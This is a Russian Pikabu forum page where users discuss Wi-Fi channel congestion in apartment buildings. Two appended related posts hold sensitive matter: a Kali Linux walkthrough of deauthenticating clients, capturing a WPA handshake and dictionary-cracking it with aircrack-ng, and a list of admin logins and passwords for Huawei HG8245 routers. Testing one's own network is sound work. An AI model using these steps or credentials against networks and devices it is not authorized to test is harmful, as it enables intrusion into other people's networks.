215

Что-то Wi-Fi не работает...

Что-то Wi-Fi не работает... Интернет, Wi-Fi, Сеть, Провайдер

Звонит клиент, говорит , что интернет не работает. Частая причина - несколько подключений занимают один канал. Достато просто его сменить на другой. Но тут же ситуация патовая. А главное техники провайдеров даже не заморачиваются на то, чтобы это настраивать. По мне так лучше ставить один общий роутер на этаж, чем забивать друг другу каналы.

Дубликаты не найдены

+19

а как тут настроишь если точек больше чекм каналов? да еще и провайдеры разные, никак не согласуешь, хотите стабильный интернет - кидайте кабель.

раскрыть ветку 10
+3

и/или ограничивайте мощность.

раскрыть ветку 8
+4

это будет работать только если все будут ограничивать.

раскрыть ветку 7
0
Отключает захват волны и понимаешь мощность. За частоту ни кто не борется, работает как часы
+42

wi-fi в диапазоне 5GHz решит эту проблему

раскрыть ветку 46
+7

Именно так и решил проблему у себя дома.... на 5 Ghz вообще никого нет =D

раскрыть ветку 16
+1
Адаптер для компа новый брал?
раскрыть ветку 14
0
В следующем году буду себе покупать АС от тика,он двухдиапазонный. а пока пользуюсь тем, что снёс региональные настройки, и принудить но выкрутил тик, на 25%мощьности, ибо роутеры одного провайдера реально засрали все каналы. Угадайте какой мой?😂
Иллюстрация к комментарию
+2
Не все девайсы умеют 5ггц
раскрыть ветку 25
+10
Комментарий удален. Причина: данный аккаунт был удалён
раскрыть ветку 9
0

5 Гц хорош, но вроде дальность сигнала меньше чем у 2.4 Гц

0

недорого уже стоят, лучше купить новый, чем так мучиться!

раскрыть ветку 9
-1

5ггц поддерживают все смартфоны не старше лет четырёх примерно, а в ноуте в крайнем случае можно карточку поменять. Недостаточно?

раскрыть ветку 3
0
Да уж, надо ставить себе, благо телефоны тянут 5ггц.
раскрыть ветку 2
0

Для наглядности  мой 5ГГц

раскрыть ветку 1
+6

Кошмар. Вот после таких советов неразобравшиеся люди залезают в настройки и меняют каналы создавая проблемы а не решая их.

Две точки доступа на одном канале мешают друг другу гораздо меньше чем на соседних каналах. Техники провайдеров обычно делают абсолютно верно ставя ТД на 1,6,11 каналы.

wifi-analyzer хоть и интересная штука чтобы посмотреть кто рядом но для оценки загруженности канала мало подходит.

раскрыть ветку 3
+2

Техники чаще просто оставляют "авто" и роутер сам выбирает канал.

0

можно подробней или ссылку?

0

Что-за ебаный миф и среди пользователей, и среди техподдержки??? Они не пересекаются МЕЖДУ СОБОЙ, а не между собой и другими роутерами.

+3

У ТСа изначально сигнал никакой, у меня по всей квартире в районе 50 dbm

раскрыть ветку 1
0
46-50.
до этого был 68-70.
рекомендую погуглить как распространчется сигнал вайфай, что ему мешает, и как устанавливать, в том плане, что его не рекомендуют ближе 50 см к стене ставить.
и зеркала еще мешают очень.
+2
На картинке большая часть точек на уровне шумов. Присутствие еле различимо. Сетку Фарадея под обои. Кажется, была новость о выпуске специальных обоев, глушащих радиоволны.
раскрыть ветку 2
+3
А мобильником чтоб пользоваться - во двор выходить?
раскрыть ветку 1
0

К окну подойти и все. Многолучевой прием никто не отменял.

+2
Да вот, стою на улице, до ближайшего дома метров 25. И такая картина.
раскрыть ветку 2
+9
Ммм шаурма 😀
раскрыть ветку 1
0
Ага, есть такая тут, правда подальше чем дом от меня :)
+1

Если предположить что у клиента сеть yrok-wifi, то проблема не с помехами от соседских точек, а в самом роутере. У меня тоже помимо моей сети еще штук 30-40 можно насчитать, но у них уровень сигнала ниже -80, при этом у меня уровень сигнала -40 и скорость 90мбит. Там вообще еще куча параметров по которым можно шлифовать этот вайфай.

+1

Самое время задуматься о 5ГГц WiFi:) У меня было примерно так же, но точек раза в полтора меньше. Поставил 2-диапазонный xiaomi — телефоны на 2,4 ГГц, ноут и медиаплеер — на 5 ГГц.

раскрыть ветку 3
+3
Минус в том что 5ггц распространяется на вдвое меньшее расстояние и хуже проходит препятствия. Через 2 железобетонные стены и 6 метров расстояния сигнал уже еле дотягивается. Роутер xiaomi самый дешевый двухдиапазонный из линейки. Конечно если взять роутер мощнее то пробивать будет лучше.
раскрыть ветку 2
0

Согласен полностью

0
Насчет расстояния, как по мне так это плюс
+1

Увы. У нас эта проблема не имеет пока решения и только усугубляется с каждым днем. Вайфая хотят все, устройств все больше и все большая часть из них не сертифицирована и не соответствует никаким нормам. Для многоэтажной застройки это уже катастрофа.

А цифровая грамотность населения- на нуле и не позволяет найти выходы из ситуации путем перехода на коллективное оборудование либо на другие частоты.

раскрыть ветку 4
+3

Товарищ, не могли бы просветить меня, как существо неграмотное (в данном вопросе). Чем же конкретно плохо такое кол-во точек Wi-Fi и такая плотность сигнала? Как то снижается пропускная способность или что? Если можно подробно но по простому.

раскрыть ветку 3
+10
Представьте себе толпу людей, каждый из которых с кем-то разговаривает. Если вы отойдете от собеседника на 15 метров, то часть его слов уже не будете слышать, ибо они будут забиваться чужими диалогами. А если бы вы были вдвоём, то и за 30 метров прекрасно слышали собеседника. Вот так же и тут.
раскрыть ветку 1
+4

Ты сможешь быстро пробежать по салону автобуса, забитому до предела людьми?

0

3 канал более мение свободен

0

Скоро придется квартиру алюминием изолировать от соседских роутеров.

0
Вполне обычная картина как для многоэтажки....
купил себе пару роутеров xiaomi mini прошил падаваном и настроил 1 как роутер, 1 как точка доступа в другом конце квартиры, теперь даже на 2.4ггц у меня скорость 85-100мбит, пинг 1мс и нет потерь пакетов... ТП Линк 841 в таких условиях дико тупил и не выдавал больше 30мбит...
0
Пусть 5гц купит. Я так от всех соседей оторвался
раскрыть ветку 2
0

Нужно не только роутер 5ГГц купить, но и все телефоны/ноуты чтобы умели в него. У меня дома только 1 телефон умеет, остальные только на 2,4

раскрыть ветку 1
0
Телефону хватит 2,4 с максимально свободным каналом для пк антену на 5гц купить. Будет больше радости тем кто блютус использует вместе с вайфаем
0

Все советуют переходить на 5 ГГц, но в долгосрочной перспективе это плохое решение, т.к. 5 ГГц засрется также быстро, как и все остальные частоты((

+1
Wifi analyzer
+1
Какой прогой такое смотреть?
раскрыть ветку 3
+4
Wi Fi analyzer
раскрыть ветку 2
0

Их там штук 5 развелось

раскрыть ветку 1
0
О, у меня почти так было. Помогает только роутер двухдиапазонный.
-1

33 SSID на 64 канала, думаю норм. автовыбор канала сделайте

-15
Зато все какашками кидались, когда предлагался законопроект о регистрации вифи роутеров
раскрыть ветку 3
+7
И что бы дала регистрация роутера? Меньше их от этого не станет. Только цены вырастут. Но вам же олигархам насрать...
0
Ну слушали бы фразу "ну от меня то вы чего хотите?" не от пикабу, а от тётки с еблетом, будто она уже часа три смотрит как пистолетов трахает просроченный йогурт.
0
Тут не регистрировать надо, а чет с мощностью думать. Дома то ещё более или менее устроиться можно, а вот во всяких бц с их бумажными перегородками, каждый прыщавый администратор считает своим долгом выкрутить мощность по максимуму, дабы "даже до парковки било". На позапрошлой работе мы с соседями нормально посидели под пивасик и все точки раскидали, а потом одна контора переехала и вместо них въехали сраные мудаки с таким же администратором - долбаебом. В итоге все вылилось в какую-то сраную битву бюджетов, когда две конторы по полной засирали всю полосу 2.4ghz, а все кто был между ними плакали, тянули медь и вяло переползали на 5 гигагерц.
ещё комментарии
-3

Чё за прога для обмерки? У меня 11й лучше всего работает.

раскрыть ветку 1
+4
Wi fi analyzer
Похожие посты
118

Тестирование на проникновение и усиление безопасности Вашей WiFi сети. Kali Linux

Здравствуйте.

Сразу хочу оговориться, что данный пост имеет рекламный мотив. Нет, я не впариваю Вам вейпы или ножи-кредитки. Я размещаю полезную информацию для IT-Специалистов в своем Telegram канале и буду рад поделится своим опытом с Вами. Вот ссылка на канал https://telegram.me/to_sysadmins заходите, читайте, используйте в работе.

_____________________________________________________________________________________________________________________________

Сегодня речь пойдет о пентесте беспроводных сетей с помощью дистрибутива Kali Linux. В нем уже предустановлено достаточно утилит для тестирования "дыр" в безопасности сетей. В этом посте мы рассмотрим

перехват handshake и брут пароля.

Тестирование на проникновение и усиление безопасности Вашей WiFi сети. Kali Linux Linux, Безопасность, Взлом, IT, Сеть, Wi-Fi, Полезное, Иркутск, Длиннопост

Первым этапом будет настройка wifi адаптера. Для того, чтобы убедится,

Что Ваш адаптер поддерживает инъекции мы откроем терминал и введем команду:

airmon-ng

Терминал выведет список ваших беспроводных карт, поддерживающих

инъекции.Вероятнее всего Ваш адаптер будет называться "wlan0"

Дальше мы вводим в терминал команду:

airmon-ng start wlan0

airmon переведет адаптер в режим монитора. Дальше мы соберем информацию

о нашей сети. Для этого в пишем:

airodump-ng wlan0mon
Тестирование на проникновение и усиление безопасности Вашей WiFi сети. Kali Linux Linux, Безопасность, Взлом, IT, Сеть, Wi-Fi, Полезное, Иркутск, Длиннопост

Обратите внимание, что "wlan0mon" это название моего адаптера, убедитесь, что ввели

правильное название, возможно у Вас будет просто mon0. Так что перепроверьте.

Если все сделано верно, то на экране вы увидите вписок доступных Вам сетей,

Находим Вашу сеть и вводим команду, заменяя коментарии в скобках на свои данные

airodump-ng -c (канал) --bssid (bssid) -w /root/Desktop/ (интерфейс монитора)

Теперь Вы будете видеть и отслеживать только выбранную вами (Вашу) сеть.

оставляем airodump работать, а сами ускорим процесс захвата handshake.

Открываем второе окно терминала и пишем

aireplay-ng -0 2 -a (bssid маршрутизатора) -c (Номер клиентской станции берем в окне с работающим airodump-ng) wlan0mon

Этой командной мы принудительно отключаем клиента от нашей точки. Когда клиентское устройство

Повторно подключится к сети, мы успешно перехватим handshake.

Переходим на первое окно с работающим airodump-ng и убеждаемся в этом.

Теперь у нас на руках имеется пароль от WiFi сети, лежит он на рабочем столе в файле с разрешением *.cap

Но он пока зашифрован.Нам нужен словарь (в Kali Linux словарь уже есть и лежит

в папке /usr/share/wordlist/rockyou.txt) пароль нужно подбирать.

Для этого пишем в терминале:

aircrack-ng -a2 -b (bssid маршрутизатора) -w (путь к словарю) /Root/Desktop/*. cap

Скорость перебора зависит от мощности вашего компьютера. Если ваш компьютер слабоват

для такого рода действий, то в интернете есть как платные, так и бесплатные сервисы

расшифровки рукопожатий.

Если пароль расшифровать не удалось, то поздравляю Ваша сеть хорошо

защищена, в противном случае Вам необходимо сменить пароль на более сложный

И обязательно отключить протокол WPS в роутере.

Показать полностью 1
1299

Wi-Fi антенна за 5 минут, или + 100Мбит

В квартире стоит 1 Wi-Fi роутер, который раздаёт картинки с котиками из интернетов на 8 устройств.

Покрытие не идеальное, но достаточное для стабильной работы.

Почти везде, кроме одной точки.

В самой дальней точке, на стареньком ПК в мастерской, стоит Ви-Фи свисток со встроенной антенной. И ловит он там 1-2 палки при постоянно пляшущей скорости соединения, в среднем 32Мбит-а.

Что-то тяжёлое между машинами кидать практически бесполезно, или ждём неделю, или обрыв будет где-то...

Решил исправить эту ситуёвину тем, что было под рукой с минимумом затрат времени и финансов.

Потребуется:

1. медная проволока (брал центральную жилу коаксиала от ТВ);

2. цилиндрический предмет внешним диаметром 10мм (колпачок от маркера, например);

3. кусачки;

4. паяльник;

Короче, всё то, что есть у каждого нормального мужика "под подушкой" в большом запасе.

Wi-Fi антенна за 5 минут, или + 100Мбит Wi-Fi роутер, Wi-Fi, Самоделки, Антенна, Усилитель, Сигнал, Сеть, Домашнее, Длиннопост

Проволочку фигачим вот таким образом, главное -размеры. Всё нужно ровно до 1 мм.

Wi-Fi антенна за 5 минут, или + 100Мбит Wi-Fi роутер, Wi-Fi, Самоделки, Антенна, Усилитель, Сигнал, Сеть, Домашнее, Длиннопост

А вот готовый девайс.

Антеннку припаял к встроенной антенне (дорожке на плате). Слегка подрезал корпус для вывода новой внешней антенны. Висит сия хрень на потолке.

Как итог:

1. 5 минут времени;

2. 0 руб. денег;

3. +100Мбит к скорости соединения и полная стабильность;

Теперь полная шкала приёма, стабильная скорость в 150Мбит.

Показать полностью 5
453

Ростелеком, Huawei и подключение

Чота ржу. Сегодня я изменил статус любимого абонента старого провайдера, выкупленного с потрохами Ростелекомом, на нелюбимого абонента Ростелеком.

Начало положено успешно - мальчик сбежал, увидев, что пока он оптику тянул, я уже все подключил. Оставив мне бухту и коннекторы, которые он даже не распаковал.

Зато после его поспешного ухода я столкнулся с проблемой отсутствия тырнета на других компах кроме своего любимого. После плясок с бубном и обращения к богам гуглы выяснил, что у их роутера три порта LAN из четырёх отключены, а под видом логина админа они мне юзверевский подсунули.

Позвонил в техподдержку и после общений с разнообразными людьми и ботами меня категорически уверили что так они получают с завода и ничего не могут изменить.

Но проблема - нормальный рутовский доступ, была обозначена и после шаманства с гуглем на предмет прошивок этой железки я раздобыл админские права и включил все lan-порты.

Сижу и офигеваю - саппорт не знает того, что я за десять минут нашел.

При этом я их предупреждал во время агитации что у мну компов много и порты все нужны. И они таки уверяли что все будут работать.

Для несчастных обладателей Huawei HG8245, имеющих более одного компьютера, выкладываю нормальные рутовские логин/пароль:

telecomadmin\admintelecom

telecomadmin\NWTF5x%RaK8mVbD

telecomadmin\NWTF5x%

telecomadmin\nE7jA%5m

Но ломать вы будете на свой страх и риск!

Ростелеком, Huawei и подключение Ростелеком, Провайдер, Роутер, Huawei, Шаманство, Сеть, Root
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: